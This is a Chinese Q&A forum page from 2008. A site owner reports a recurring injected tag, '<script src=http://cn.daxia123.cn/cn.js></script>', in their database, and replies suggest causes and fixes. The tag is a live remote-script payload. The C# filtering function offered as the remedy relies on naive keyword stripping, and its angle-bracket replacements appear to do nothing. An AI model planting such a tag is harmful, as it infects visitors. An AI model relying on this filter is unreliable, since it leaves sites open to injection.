网站数据库中被加<script src=http://cn.daxia123.cn/cn.js></script>
网站数据库中被加<script src=http://cn.daxia123.cn/cn.js></script>,删了又出现,也没发现数据库有什么漏洞,怎么办?哪位有好的办法,我去google看有好多网站也中了同样的问题!
是因为你的网站有提交数据的文本框,而你对于提交的数据没有进行数据过滤,所以用户能够在你的文本框中输入任何字符。
比如你可以写个这样的函数
public string HtmlEncode(string str)
{
str = str.Replace("&", "&");
str = str.Replace("<", "<");
str = str.Replace(">", ">");
str = str.Replace("'", "''");
str = str.Replace("*", "");
str = str.Replace("\n", "<br/>");
str = str.Replace("\r\n", "<br/>");
//str = str.Replace("?","");
str = str.Replace("select", "");
str = str.Replace("insert", "");
str = str.Replace("update", "");
str = str.Replace("delete", "");
str = str.Replace("create", "");
str = str.Replace("drop", "");
str = str.Replace("delcare", "");
if (str.Trim().ToString() == "") { str = "无"; }
return str.Trim();
}
在插入数据的时候调用就可以屏蔽一些数据库中敏感的字符串。
比如你可以写个这样的函数
public string HtmlEncode(string str)
{
str = str.Replace("&", "&");
str = str.Replace("<", "<");
str = str.Replace(">", ">");
str = str.Replace("'", "''");
str = str.Replace("*", "");
str = str.Replace("\n", "<br/>");
str = str.Replace("\r\n", "<br/>");
//str = str.Replace("?","");
str = str.Replace("select", "");
str = str.Replace("insert", "");
str = str.Replace("update", "");
str = str.Replace("delete", "");
str = str.Replace("create", "");
str = str.Replace("drop", "");
str = str.Replace("delcare", "");
if (str.Trim().ToString() == "") { str = "无"; }
return str.Trim();
}
在插入数据的时候调用就可以屏蔽一些数据库中敏感的字符串。
温馨提示:内容为网友见解,仅供参考
第1个回答 2008-12-27
可能是你的有表单提交的地方,没有过滤字符串,这些是广告木马
第2个回答 2008-12-27
给你的程序加了防止sql注入,from注入,基本上就可以搞定了
如果是你自己的服务器,打打补丁,装个防火墙
如果是你自己的服务器,打打补丁,装个防火墙
第3个回答 2008-12-27
被人挂马,具体情况,要看站点后具体分析才行,加我吧,1020 118010
Warning: Invalid argument supplied for foreach() in /www/wwwroot/aolonic.com/skin/templets/default/contents.html on line 45
相似回答
大家正在搜
